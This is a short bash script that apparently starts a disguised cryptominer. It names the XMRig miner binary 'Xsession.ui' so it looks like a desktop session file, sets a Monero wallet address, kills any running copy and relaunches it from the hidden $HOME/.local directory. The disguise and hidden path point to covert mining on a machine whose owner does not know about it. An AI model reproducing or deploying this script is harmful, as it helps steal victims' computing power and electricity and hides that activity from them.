#!/bin/bash

XMRIGNAME=Xsession.ui
WALLET=41gaYmwQbHV9DHEhfqE9YGMnYXc8fXov63MfHrJwSETL3RJsuYaMg8f6sTAkNxvjSiGuw1qCfYFE515ogxU171wYH5RnkJJ
LOCAL_PATH=$HOME/.local

pkill $XMRIGNAME
$LOCAL_PATH/$XMRIGNAME